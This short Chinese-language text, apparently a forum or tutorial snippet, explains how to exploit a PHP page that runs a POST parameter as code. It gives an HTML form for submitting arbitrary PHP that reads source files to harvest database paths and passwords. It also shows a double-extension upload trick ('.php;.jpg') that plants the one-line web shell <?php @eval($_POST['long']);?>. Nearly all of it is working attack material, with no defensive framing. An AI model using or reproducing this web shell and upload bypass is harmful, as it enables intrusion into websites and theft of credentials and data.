执行POST来的cmd参数语句,别人可以以任何内容提交,这个程序把提交的数据当PHP语句执行,利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成,例如:
<form method=post action=http://....../你的名字.php>
<textarea name=cmd>
//这里面写PHP程序,随便连接数据和修改文件都可以,当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码
$str=file_get_content('xxx.php');
$str=str_replace('<','<',$str);
echo "<pre>$str</pre>"
</textarea>
<input type=submit>
</form>
可以上传个图片文件,名称为:CELIVE-31G5CuG3Af.php;.jpg
内容为:<?php @eval($_POST['long']);?>